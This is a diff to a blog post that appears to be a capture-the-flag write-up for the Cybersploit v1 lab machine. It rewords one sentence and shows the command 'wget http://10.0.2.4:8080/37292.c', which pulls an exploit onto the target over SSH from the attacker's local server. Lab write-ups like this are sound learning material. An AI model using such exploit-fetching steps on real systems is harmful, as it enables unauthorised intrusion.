mackiser/astro-theme-cactus/src/content/post/cybersploit-v1/index.md

 #### Downloading Exploit on Target Machine

-Now to download the exploit on the target machine we will run `wget http://10.0.2.4:8080/37292.c` via the ssh session we opened earlier.
+To download the exploit on the target machine we will run `wget http://10.0.2.4:8080/37292.c` via the ssh session we opened earlier.

 ```sh
 $ wget http://10.0.2.4:8080/37292.c